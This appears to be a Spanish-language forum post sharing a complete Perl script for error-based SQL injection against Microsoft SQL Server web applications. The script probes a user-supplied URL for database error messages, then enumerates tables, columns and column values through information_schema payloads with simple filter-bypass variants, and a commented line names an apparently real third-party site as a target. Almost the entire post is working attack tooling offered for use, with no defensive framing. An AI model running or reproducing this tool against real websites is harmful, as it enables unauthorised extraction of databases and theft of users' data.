Autor
buscar tablas y columnas con information_schema en MSSQL
Tambien pueden sacar los valores que quieren de las columnas.
Código
#!usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011
use LWP::UserAgent;
use HTTP::Request::Common;
my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
sub head {
print q(
@@ @@ @@@@ @@@@ @@@ @@ @@@@@@ @@@ @@@ @@
@@@ @@@ @@ @ @@ @ @@@@@ @@ @@ @@@@@ @@@@@ @@
@@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@@@@@@@@@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@@@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @ @@ @ @@ @@@@@ @@ @@ @@@@@ @@@@@ @@
@@ @@ @@ @@@@ @@@@ @@@@@ @@@@ @@ @@@ @@@ @@@@
);
}
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
<stdin>;
exit(1);
}
repe();
sub repe {
system("cls");
head();
print "\n\n[Page] : ";
chomp(my $page=<stdin>);
$code = toma($page);
if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}
menu:
print q(
##################################
1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit
##################################
);
print "[Opcion] : ";
chomp(my $op=<stdin>);
if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
}
#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");
sub mssql_columns {
($pass1,$pass2) = bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
sub mssql_tables {
($pass1,$pass2) = bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
sub mssql_data {
($pass1,$pass2) = bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
}
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}
sub toma {
return $nave->request(GET $_[0])->content;
}
# ¿ The End ?
En línea
